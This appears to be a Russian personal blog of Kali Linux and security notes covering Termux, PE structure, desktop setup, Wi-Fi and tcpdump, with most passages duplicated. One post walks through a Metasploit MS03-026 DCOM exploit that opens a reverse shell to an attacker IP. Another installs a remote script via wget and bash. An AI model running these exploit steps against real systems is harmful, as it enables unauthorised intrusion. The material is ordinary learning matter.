git clone https://github.com/rajkumardusad/Tool-X.git - ставим из git Tool-X
cd Tool-X - переходим в каталог с Tool-X 
chmod +x install.aex - даем права на выполнение
sh install.aex если не работает выполняем так ./install.aex

sudo apt update - обновляем установленные пакеты

sudo apt install git - устанавливаем git

git clone https://github.com/rajkumardusad/Tool-X.git - ставим из git Tool-X

cd Tool-X - переходим в каталог с Tool-X

chmod +x install.aex - даем права на выполнение

sh install.aex если не работает выполняем так ./install.aex

Как использовать?

(0) : установить все программы
(1): показать все доступные инструменты и ввести номер инструмента, который вы хотите установить.
(2): Показать категорию инструментов.
(3): для установки операционной системы в Termux
(4): если вы хотите обновить Tool-X.
(5): Если вы хотите знать о нас.
(х): для выхода из инструмента.


Программы устанавливаются сюда:
cd /root - для linux
cd /data/data/com.termux/files/home - для android termux

(0) : установить все программы

(1): показать все доступные инструменты и ввести номер инструмента, который вы хотите установить.

(2): Показать категорию инструментов.

(3): для установки операционной системы в Termux

(4): если вы хотите обновить Tool-X.

(5): Если вы хотите знать о нас.

(х): для выхода из инструмента.

Программы устанавливаются сюда:

cd /root - для linux

cd /data/data/com.termux/files/home - для android termux

kali \ virus \ rootkit \ вирусы \ защита

pe_format7

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/21

DOS заголовок
четыре байта 4D 5a   значение Mz
текст ..program cannot be run Dos mode.
так же  адрес начало pe заголовка. 50 45 значение Pe

PE заголовок
5045 значение Pe
Здесь мы можем увидеть список секций. обычно не больше 10.
У каждой секции есть атрибуты чтения, записи и исполнения.
Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы. 

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.
.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.
.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.



petools программа для ковыряния исполнительных файлов.
entry point адресс входа в программу

DOS заголовок

четыре байта 4D 5a значение Mz

текст ..program cannot be run Dos mode.

так же адрес начало pe заголовка. 50 45 значение Pe

PE заголовок

5045 значение Pe

Здесь мы можем увидеть список секций. обычно не больше 10.

У каждой секции есть атрибуты чтения, записи и исполнения.

Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы.

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.

.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.

.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.

petools программа для ковыряния исполнительных файлов.

entry point адресс входа в программу

kali \ virus \ rootkit \ вирусы \ защита

из одного видео по безопасности :)

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/21

Пользователь:

Пользователь никогда не должен иметь доступ к источнику информации.

1	Пользователь никогда не должен иметь доступ к источнику информации.

Вирусы:

Блокировщики
Диструкторы
Шифраторы
Шпионы
Ботнет-DDOS

Блокировщики

Диструкторы

Шифраторы

Шпионы

Ботнет-DDOS

Запуск:

1. autorun.inf
2. авто установщики / авто архивы
3. скрипты\зараженные страницы.
4. java \ flash \ ПО \ ОС \ дыры

1. autorun.inf

2. авто установщики / авто архивы

3. скрипты\зараженные страницы.

4. java \ flash \ ПО \ ОС \ дыры

Защита:

1. Сканирование
2. Запуск в песочнице
3. Отслеживание действий
4. Проверка записи
5. Полная проверка (drweb cureit) AVZ

1. Сканирование

2. Запуск в песочнице

3. Отслеживание действий

4. Проверка записи

5. Полная проверка (drweb cureit) AVZ

Запись неверной инфы в программу / данные:

вероятные события
1. остановка
2. не верный результат

90% - чтение данных
10% - записи данных

Два сервера первый запись и чтение. 
а второй резервный только запись
в сучили аварии основного сервера начинаем использовать резервный.

вероятные события

1. остановка

2. не верный результат

90% - чтение данных

10% - записи данных

Два сервера первый запись и чтение.

а второй резервный только запись

в сучили аварии основного сервера начинаем использовать резервный.

пароли — подбор:

1. 62 варианта
2. 62 в квадрате 3844
3. Не Болтай..... шоколадки рулят...
4. простые пароли
5. вскрываемые социальные пароли
6. одиночные слова и короткие фразы
7. пустой пароль

1. 62 варианта

2. 62 в квадрате 3844

3. Не Болтай..... шоколадки рулят...

4. простые пароли

5. вскрываемые социальные пароли

6. одиночные слова и короткие фразы

7. пустой пароль

kali \ virus \ rootkit \ вирусы \ защита

dotNET

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/21

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп
J Sharp = J# джишарп
Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык
http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты
net.reflector + addons reflexil.netreflector
ilspy

Крэкми
Можем редактировать только il  язык

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп

J Sharp = J# джишарп

Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык

http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты

net.reflector + addons reflexil.netreflector

ilspy

Крэкми

Можем редактировать только il язык

Android kali \ virus \ rootkit \ вирусы \ защита

termux / metasploit / kali / nethunter

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/20

Ссылки:

https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0
https://wiki.termux.com/wiki/Kali_Nethunter
https://f-droid.org/packages/com.termux/
https://wiki.termux.com/wiki/Main_Page

https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0

https://wiki.termux.com/wiki/Kali_Nethunter

https://f-droid.org/packages/com.termux/

https://wiki.termux.com/wiki/Main_Page

Старая доп панель:
vi ~/.termux/termux.properties

extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]

1	extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]

Kali Nethunter

Установка nethunter:
pkg install wget
wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
chmod +x kalinethunter
bash kalinethunter

Решение проблем после установки:
apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt --fix-broken install
dpkg -i ./kali-archive-keyring_2018.1_all.deb

Установка nethunter:

pkg install wget

wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

chmod +x kalinethunter

bash kalinethunter

Решение проблем после установки:

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb

apt --fix-broken install

dpkg -i ./kali-archive-keyring_2018.1_all.deb

metasploit

pkg update
pkg install unstable-repo
pkg install metasploit
msfconsole
db_status
git init

----------
----------

use auxiliary/scanner/portscan/tcp
set PORTS 1-5000
set RHOSTS 192.168.88.161
run
search dcom
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp
show options
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247  - IP злоумышленника
run
cd ..\..\
echo Hello! >  achtung.x
msg helo
можно вводить любую команду, как в обычном cmd.exe

pkg update

pkg install unstable-repo

pkg install metasploit

msfconsole

db_status

git init

----------

use auxiliary/scanner/portscan/tcp

set PORTS 1-5000

set RHOSTS 192.168.88.161

run

search dcom

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/shell_reverse_tcp

show options

set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)

set LHOST 192.168.88.247 - IP злоумышленника

run

cd ..\..\

echo Hello! > achtung.x

msg helo

можно вводить любую команду, как в обычном cmd.exe

Любимые приложения:

pkg install openssh python golang vim

1	pkg install openssh python golang vim

kali \ virus \ rootkit \ вирусы \ защита

как изменить фон GRUB в Kali Linux

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка
/usr/share/images/desktop-base/kali-grub.png - само изображение тут
mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла
cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png  - копируем нашу новую заставку для grub
update-grub - просим grub перечитать конфиг файлы

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка

/usr/share/images/desktop-base/kali-grub.png - само изображение тут

mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла

cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png - копируем нашу новую заставку для grub

update-grub - просим grub перечитать конфиг файлы

kali \ virus \ rootkit \ вирусы \ защита

решение ошибки «Следующие подписи неверные» в Kali Linux

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

wget 'https://archive.kali.org/archive-key.asc'
apt-key add archive-key.asc

1 2	wget 'https://archive.kali.org/archive-key.asc' apt-key add archive-key.asc

kali \ virus \ rootkit \ вирусы \ защита

x \ xwindows \ gnome \ Cinnamon \ KDE \ LXDE \ MATE

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

Cinnamon

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка 

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

Установка Xfce в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка
sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

1 2	sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

Установка KDE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка 
sudo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная
sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка

sudo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная

sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

Установка LXDE в Kali Linux:

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка 

sudo apt-get remove lxde-core lxde - удаление

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove lxde-core lxde - удаление

Установка GNOME в Kali Linux:

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

Установка MATE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core  - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core - удаление

Установка e17 в Kali Linux:

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

Изменить окружение из установленных:

Используйте следующую команду чтобы выбрать главное окружение рабочего стола. 
Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Используйте следующую команду чтобы выбрать главное окружение рабочего стола.

Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Включить/отключить графический режим с помощью systemctl

Узнать какой режим сейчас установлен можно командой:
systemctl get-default

graphical.target - запускается графическая оболочка при старте
multi-user.target - графика не стартует

Отключить запуск X-ов при старте системы:
systemctl set-default multi-user.target

Вернуть обратно запуск графической оболочки:
systemctl set-default graphical.target

Узнать какой режим сейчас установлен можно командой:

systemctl get-default

graphical.target - запускается графическая оболочка при старте

multi-user.target - графика не стартует

Отключить запуск X-ов при старте системы:

systemctl set-default multi-user.target

Вернуть обратно запуск графической оболочки:

systemctl set-default graphical.target

kali \ virus \ rootkit \ вирусы \ защита

очистка системы \ временные файлы \ кеш обновлений \

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

!!! Будь осторожен можно сломать дистрибутив
sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО
sudo apt-get autoclean -y - удалить скачанные файлы архивов
sudo apt-get clean -y - удалить старые скачанные файлы архивов
sudo apt-get install -f -y - решение проблем с установкой по

!!! Будь осторожен можно сломать дистрибутив

sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО

sudo apt-get autoclean -y - удалить скачанные файлы архивов

sudo apt-get clean -y - удалить старые скачанные файлы архивов

sudo apt-get install -f -y - решение проблем с установкой по

kali \ virus \ rootkit \ вирусы \ защита

wi-fi настройка

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

iwconfig wlan0
iwconfig wlan0 essid name key password 
iwconfig wlan0 essid name key s:password


ip link set wlp2s0 up - включить устройство wlp2s0 
!!! Если у вас возникнет ошибка:
!!! RTNETLINK answers: Operation not possible due to RF-kill
!!! Можно установить утилиту rfkill и с ее помощью решить эту проблему.


lspci | grep -i wireless - поиск беспроводных pci-карт
ip link list - выводе этой команды будет содержать все сетевые интерфейсы
iw dev - показать устройства wi-fi


iwconfig wlan0 essid "MyNet" - присвоить SSID "MyNet"
iwconfig wlan0 channel 3 - установит канал 3
iwconfig wlan0 mode Ad-Hoc - сменить режим Managed на Ad-Hoc
iwconfig wlan0 ap any - использовать любую точку доступа
iwconfig wlan0 sens -50 - установить чувствительность -50
iwconfig wlan0 retry 20 - установить значение 20 для повторной передачи MAC
ifconfig wlan0 key 1234-pass-123 - установить пароль 1234-pass-123
iwconfig wlp4s0 mode ad-hoc - настройка режима работы ad-hoc
iwconfig wlp4s0 essid ваш_essid - подключение к незащищенной сети
iwconfig wlp4s0 essid ваш_essid freq 2432M - подключение с задающим каналом сети
iwconfig wlp4s0 essid ваш_essid key s:ваш_ключ -подключение к WEP зашифрованному каналу сети, ключа ASCII
iwconfig wlp4s0 power on - включение режима экономии питания


iw dev wlp4s0 link iwconfig wlp4s0 - показать статус соединения
iw dev wlp4s0 scan iwlist wlp4s0 scan -сканирование сети на точки доступа
iw dev wlp4s0 set type ibss  - настройка режима работы ad-hoc
iw dev wlp4s0 connect ваш_essid - подключение к незащищенной сети
iw dev wlp4s0 connect ваш_essid 2432 - подключение с задающим каналом сети
iw dev wlp4s0 connect ваш_essid key 0:ваш_ключ -  -подключение к WEP зашифрованному каналу сети, ключа ASCII
iw dev wlp4s0 set power_save on - включение режима экономии питания
iw dev wlp4s0 scan | less - сканируем сеть

iwconfig wlan0

iwconfig wlan0 essid name key password

iwconfig wlan0 essid name key s:password

ip link set wlp2s0 up - включить устройство wlp2s0

!!! Если у вас возникнет ошибка:

!!! RTNETLINK answers: Operation not possible due to RF-kill

!!! Можно установить утилиту rfkill и с ее помощью решить эту проблему.

lspci | grep -i wireless - поиск беспроводных pci-карт

ip link list - выводе этой команды будет содержать все сетевые интерфейсы

iw dev - показать устройства wi-fi

iwconfig wlan0 essid "MyNet" - присвоить SSID "MyNet"

iwconfig wlan0 channel 3 - установит канал 3

iwconfig wlan0 mode Ad-Hoc - сменить режим Managed на Ad-Hoc

iwconfig wlan0 ap any - использовать любую точку доступа

iwconfig wlan0 sens -50 - установить чувствительность -50

iwconfig wlan0 retry 20 - установить значение 20 для повторной передачи MAC

ifconfig wlan0 key 1234-pass-123 - установить пароль 1234-pass-123

iwconfig wlp4s0 mode ad-hoc - настройка режима работы ad-hoc

iwconfig wlp4s0 essid ваш_essid - подключение к незащищенной сети

iwconfig wlp4s0 essid ваш_essid freq 2432M - подключение с задающим каналом сети

iwconfig wlp4s0 essid ваш_essid key s:ваш_ключ -подключение к WEP зашифрованному каналу сети, ключа ASCII

iwconfig wlp4s0 power on - включение режима экономии питания

iw dev wlp4s0 link iwconfig wlp4s0 - показать статус соединения

iw dev wlp4s0 scan iwlist wlp4s0 scan -сканирование сети на точки доступа

iw dev wlp4s0 set type ibss - настройка режима работы ad-hoc

iw dev wlp4s0 connect ваш_essid - подключение к незащищенной сети

iw dev wlp4s0 connect ваш_essid 2432 - подключение с задающим каналом сети

iw dev wlp4s0 connect ваш_essid key 0:ваш_ключ - -подключение к WEP зашифрованному каналу сети, ключа ASCII

iw dev wlp4s0 set power_save on - включение режима экономии питания

iw dev wlp4s0 scan | less - сканируем сеть

kali \ virus \ rootkit \ вирусы \ защита

проверка и исправление репозиториев \ apt \ sources.list

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/17

Проверка файла sources.list:

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

Одно из решений, перепишем sources.list:

0. Делаем резервную копию
cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list 
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему
а) так
sudo apt update 
sudo apt upgrade -y 
sudo apt full-upgrade -y

б) или так
sudo apt update && sudo apt full-upgrade -y

0. Делаем резервную копию

cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list

echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему

а) так

sudo apt update

sudo apt upgrade -y

sudo apt full-upgrade -y

б) или так

sudo apt update && sudo apt full-upgrade -y

kali \ virus \ rootkit \ вирусы \ защита

tcpdump / снифер / sniffer

Автор записи Автор: Evgeny Yakovlev
Дата записи 2019/09/10

Установка

yum install tcpdump - установка в centos
apt install tcpdump - установка в debian

1 2	yum install tcpdump - установка в centos apt install tcpdump - установка в debian

Опции утилиты tcpdump:

-i интерфейс # Задает интерфейс, с которого необходимо анализировать трафик (без указания интерфейса - анализ "первого попавшегося")
-n           # Отключает преобразование IP в доменные имена. Если указано -nn, то запрещается преобразование номеров портов в название протокола.
-e           # Включает вывод данных канального уровня (например, MAC-адреса).
-v           # Вывод дополнительной информации (TTL, опции IP).
-s размер    # Указание размера захватываемых пакетов. (по умолчанию - пакеты больше 68 байт)
-w имя_файла # Задать имя файла, в который сохранять собранную информацию.
-r имя_файла # Чтение дампа из заданного файла.
-p           # Захватывать только трафик, предназначенный данному узлу. (по умолчанию - захват всех пакетов, например в том числе широковещательных).
-q           # Переводит tcpdump в "бесшумный режим", пакет анализируется на транспортном уровне (протоколы TCP, UDP, ICMP), а не на сетевом (протокол IP).
-t           # Отключает вывод меток времени.

-i интерфейс # Задает интерфейс, с которого необходимо анализировать трафик (без указания интерфейса - анализ "первого попавшегося")

-n # Отключает преобразование IP в доменные имена. Если указано -nn, то запрещается преобразование номеров портов в название протокола.

-e # Включает вывод данных канального уровня (например, MAC-адреса).

-v # Вывод дополнительной информации (TTL, опции IP).

-s размер # Указание размера захватываемых пакетов. (по умолчанию - пакеты больше 68 байт)

-w имя_файла # Задать имя файла, в который сохранять собранную информацию.

-r имя_файла # Чтение дампа из заданного файла.

-p # Захватывать только трафик, предназначенный данному узлу. (по умолчанию - захват всех пакетов, например в том числе широковещательных).

-q # Переводит tcpdump в "бесшумный режим", пакет анализируется на транспортном уровне (протоколы TCP, UDP, ICMP), а не на сетевом (протокол IP).

-t # Отключает вывод меток времени.

Наиболее часто используемые фильтрующие параметры команды tcpdump:

dst хост     # Проверяет, совпадает ли адрес получателя IP-пакета с указанным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

src хост     # Проверяет, совпадает ли адрес отправителя IP пакета с указанным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

host хост    # Проверяет, совпадает ли адрес отправителя или получателя с заданным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

net имя_сети # Проверяется, находится ли адрес отправителя/получателя в заданной сети. 
             # Возможно указание сети в формате CIDR (например 10.0.0.1/22), либо указание имени сети, 
             # заданной в файле /etc/networks.


ip | arp | rarp | tcp | udp | icmp [хост]    # Проверяет, принадлежит ли пакет одному из указанных протоколов и при указании адреса хоста проверяет, 
                                             # совпадает ли адрес отправителя\получателя с заданным. 
                                             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

[tcp | udp] dst port номер_порта             # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения заданному. 
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.

[tcp | udp] src port номер_порта             # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт источника заданному.
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.     

[tcp | udp] port номер_порта                 # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения или источника заданному. 
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.

ether { src | dst | host } MAC_адрес         # Проверяется, принадлежит ли сетевой пакет источнику, назначению, 
                                             # источнику или назначению имеющему заданный MAC_адрес.


ip broadcast                                 # Проверяется, является ли IP пакет широковещательным.

ether broadcast                              # Проверяется, является ли ARP-пакет широковещательным.

dst хост # Проверяет, совпадает ли адрес получателя IP-пакета с указанным значением.

# Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

src хост # Проверяет, совпадает ли адрес отправителя IP пакета с указанным значением.

# Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

host хост # Проверяет, совпадает ли адрес отправителя или получателя с заданным значением.

# Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

net имя_сети # Проверяется, находится ли адрес отправителя/получателя в заданной сети.

# Возможно указание сети в формате CIDR (например 10.0.0.1/22), либо указание имени сети,

# заданной в файле /etc/networks.

ip | arp | rarp | tcp | udp | icmp [хост] # Проверяет, принадлежит ли пакет одному из указанных протоколов и при указании адреса хоста проверяет,

# совпадает ли адрес отправителя\получателя с заданным.

# Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

[tcp | udp] dst port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения заданному.

# Можно указать номер порта, либо имя, заданное в файле /etc/services.

[tcp | udp] src port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт источника заданному.

# Можно указать номер порта, либо имя, заданное в файле /etc/services.

[tcp | udp] port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения или источника заданному.

# Можно указать номер порта, либо имя, заданное в файле /etc/services.

ether { src | dst | host } MAC_адрес # Проверяется, принадлежит ли сетевой пакет источнику, назначению,

# источнику или назначению имеющему заданный MAC_адрес.

ip broadcast # Проверяется, является ли IP пакет широковещательным.

ether broadcast # Проверяется, является ли ARP-пакет широковещательным.

Примеры использования tcpdump:

tcpdump -i eth0                                 # слушаем интерфейс eth0

tcpdump port 80                                 # слушаем 80 порт             
                   
tcpdump host google.com                         # слушаем трафик с хоста google.com

tcpdump -n -i eth0 icmp                         # Ловим пакеты icmp (ping pong)

tcpdump | grep -v ssh                           # поиск пакетов исключая пакеты ssh

tcpdump -n -i eth0 net 192.168.1.15             # трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24           # трафик с/в сеть

tcpdump -l > dump && tail -f dump               # Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0                 # Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0            # Запись + загрузка в бинарный файл

tcpdump -r traffic.eth0                         # Читаем из файла

tcpdump -i eth0 -X port \(110 or 143\)          # Проверка pop и imap на безопасность

tcpdump -i eth0 -s 0 -A port 80 | grep GET      # (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address   # узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump -vvv -s 0 -l -n port 53                 # показываем DNS трафик

tcpdump -nl -i bge0 not port ssh and src \(192.168.16.121 or 192.168.16.54\)

tcpdump -n -i eth1 net 192.168.16.121           # Выборка входящий/исходящий по одному IP адресу
tcpdump -n -i eth1 net 192.168.16.0/24          # Выборка входящий/исходящий по адресу сети
tcpdump -l > dump && tail -f dump               # Вывод через буфер

tcpdump -i rl0 -w traffic.rl0                   # Писать заголовки в бинарный файл
tcpdump -i rl0 -s 0 -w traffic.rl0              # Писать в бинарный фйл полные пакеты
tcpdump -r traffic.rl0                          # Прочитать из файла (так-же для ethereal

tcpdump -i eth0 -s 0 -A port 80 | grep GET      # -s 0 для полных пакетов, -A для ASCII

tcpdump -i eth0 # слушаем интерфейс eth0

tcpdump port 80 # слушаем 80 порт

tcpdump host google.com # слушаем трафик с хоста google.com

tcpdump -n -i eth0 icmp # Ловим пакеты icmp (ping pong)

tcpdump | grep -v ssh # поиск пакетов исключая пакеты ssh

tcpdump -n -i eth0 net 192.168.1.15 # трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24 # трафик с/в сеть

tcpdump -l > dump && tail -f dump # Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0 # Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0 # Запись + загрузка в бинарный файл

tcpdump -r traffic.eth0 # Читаем из файла

tcpdump -i eth0 -X port $110 or 143$ # Проверка pop и imap на безопасность

tcpdump -i eth0 -s 0 -A port 80 | grep GET # (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address # узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump -vvv -s 0 -l -n port 53 # показываем DNS трафик

tcpdump -nl -i bge0 not port ssh and src $192.168.16.121 or 192.168.16.54$

tcpdump -n -i eth1 net 192.168.16.121 # Выборка входящий/исходящий по одному IP адресу

tcpdump -n -i eth1 net 192.168.16.0/24 # Выборка входящий/исходящий по адресу сети

tcpdump -l > dump && tail -f dump # Вывод через буфер

tcpdump -i rl0 -w traffic.rl0 # Писать заголовки в бинарный файл

tcpdump -i rl0 -s 0 -w traffic.rl0 # Писать в бинарный фйл полные пакеты

tcpdump -r traffic.rl0 # Прочитать из файла (так-же для ethereal

tcpdump -i eth0 -s 0 -A port 80 | grep GET # -s 0 для полных пакетов, -A для ASCII

Пример частого применения

tcpdump -n -i eth0  -s0 not port 22 and not port 8080 and not port 161 and not arp
-n 
Не преобразовывать dns имена

-i eth0 
Указывает интерфейс, на котором будет захват трафика (замените eth0 на нужный интерфейс).

-s 0
Устанавливает размер снэпшота. 
По умолчанию tcpdump захватывает только первые 96 байт каждого пакета, параметр -s 0 указывает захватывать полный пакет.


not port 22
не собирать инфу по 22 порту

and 
служит для добавления еще фильтра

not port 8080
не собирать инфу по 8080 порту

and 
служит для добавления еще фильтра

not port 161
не собирать инфу по 161 порту

and 
служит для добавления еще фильтра

not arp
не собирать инфу по arp

tcpdump -n -i eth0 -s0 not port 22 and not port 8080 and not port 161 and not arp

-n

Не преобразовывать dns имена

-i eth0

Указывает интерфейс, на котором будет захват трафика (замените eth0 на нужный интерфейс).

-s 0

Устанавливает размер снэпшота.

По умолчанию tcpdump захватывает только первые 96 байт каждого пакета, параметр -s 0 указывает захватывать полный пакет.

not port 22

не собирать инфу по 22 порту

and

служит для добавления еще фильтра

not port 8080

не собирать инфу по 8080 порту

and

служит для добавления еще фильтра

not port 161

не собирать инфу по 161 порту

and

служит для добавления еще фильтра

not arp

не собирать инфу по arp

Еще из одних частых способов применения

Возможные параметры:
-n: Не преобразовывать IP-адреса и порты в имена.
-vvv: Включает максимально подробный вывод.
-X: Показывает содержимое пакетов в шестнадцатеричном и ASCII форматах.
-i fm1-mac3: Указывает сетевой интерфейс fm1-mac3 для захвата пакетов.
port 4000: Фильтрует пакеты по порту 4000.
src 192.168.55.60: Фильтрует пакеты по IP-адресу источника 192.168.55.60.
